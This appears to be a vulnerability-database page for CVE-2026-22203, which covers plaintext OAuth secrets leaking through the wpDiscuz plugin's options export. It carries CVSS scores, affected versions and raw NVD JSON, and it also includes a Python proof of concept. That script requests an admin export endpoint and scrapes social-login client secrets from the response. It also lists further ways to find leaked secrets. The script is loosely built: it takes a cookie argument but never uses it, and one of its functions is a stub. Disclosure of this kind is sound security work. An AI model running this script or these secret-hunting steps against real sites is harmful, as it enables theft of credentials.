Security Vulnerability Report
中文
CVE-2026-22203 CVSS 4.9 MEDIUM

CVE-2026-22203

Published: 2026-03-13 19:54:11
Last Modified: 2026-03-17 20:23:48
Source: [email protected]

Description

wpDiscuz before 7.6.47 contains an information disclosure vulnerability that allows administrators to inadvertently expose OAuth secrets by exporting plugin options as JSON. Attackers can obtain exported files containing plaintext API secrets like fbAppSecret, googleClientSecret, twitterAppSecret, and other social login credentials from support tickets, backups, or version control repositories.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE
wpDiscuz < 7.6.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22203 PoC - wpDiscuz OAuth Secret Extraction # Target: WordPress site with wpDiscuz < 7.6.47 import requests import re import json import argparse def exploit_wpdiscuz_oauth_leak(target_url): """ Exploit wpDiscuz options export feature to leak OAuth secrets """ # Step 1: Find wpDiscuz admin interface export_url = f"{target_url}/wp-admin/admin.php?page=wpdiscuz-options" # Step 2: Export options as JSON (requires admin auth) # This requires a valid admin session cookie session = requests.Session() # Method 1: Direct export endpoint if available json_export_url = f"{target_url}/wp-admin/admin-ajax.php?action=wpdiscuz_export_options" headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-22203-PoC)", "X-Requested-With": "XMLHttpRequest" } # Try to export options response = session.get(json_export_url, headers=headers, verify=False) # Step 3: Parse exported JSON for OAuth secrets oauth_secrets = [] sensitive_keys = ['fbAppSecret', 'googleClientSecret', 'twitterAppSecret', 'linkedinClientSecret', 'wordpressClientSecret'] if response.status_code == 200: try: data = response.json() for key in sensitive_keys: if key in data: oauth_secrets.append({ "key_name": key, "value": data[key], "platform": key.replace('ClientSecret', '').replace('AppSecret', '') }) except: # Try parsing as raw text for key in sensitive_keys: if key in response.text: match = re.search(rf'{key}["\s:]+([^",\s]+)', response.text) if match: oauth_secrets.append({ "key_name": key, "value": match.group(1), "platform": key.replace('ClientSecret', '').replace('AppSecret', '') }) return oauth_secrets def check_github_exposure(cve_id): """ Search GitHub for leaked OAuth secrets from wpDiscuz exports """ search_url = f"https://api.github.com/search/code?q={cve_id}+wpdiscuz" # Note: Requires GitHub API token for rate limiting # This is for educational/security research purposes only return [] if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2026-22203 wpDiscuz OAuth Secret Leak") parser.add_argument("-t", "--target", required=True, help="Target WordPress URL") parser.add_argument("-c", "--cookie", help="Admin session cookie") args = parser.parse_args() print(f"[*] Analyzing {args.target} for CVE-2026-22203") secrets = exploit_wpdiscuz_oauth_leak(args.target) if secrets: print("[!] OAuth secrets found:") for secret in secrets: print(f" - {secret['platform']}: {secret['value']}") else: print("[*] No exposed secrets found (or target not vulnerable)") # Note: This PoC requires admin authentication to exploit # Alternative attack vectors: # 1. Search GitHub for exposed JSON files containing OAuth secrets # 2. Check backup files in common locations # 3. Analyze leaked support tickets

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22203", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:10.580", "lastModified": "2026-03-17T20:23:48.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wpDiscuz before 7.6.47 contains an information disclosure vulnerability that allows administrators to inadvertently expose OAuth secrets by exporting plugin options as JSON. Attackers can obtain exported files containing plaintext API secrets like fbAppSecret, googleClientSecret, twitterAppSecret, and other social login credentials from support tickets, backups, or version control repositories."}, {"lang": "es", "value": "wpDiscuz anterior a 7.6.47 contiene una vulnerabilidad de revelación de información que permite a los administradores exponer inadvertidamente secretos de OAuth al exportar las opciones del plugin como JSON. Los atacantes pueden obtener archivos exportados que contienen secretos de API en texto plano como fbAppSecret, googleClientSecret, twitterAppSecret y otras credenciales de inicio de sesión social de tickets de soporte, copias de seguridad o repositorios de control de versiones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpdiscuz/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wordpress.org/plugins/wpdiscuz/#developers", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/wpdiscuz-before-options-export-leaks-oauth-secrets-in-plaintext", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.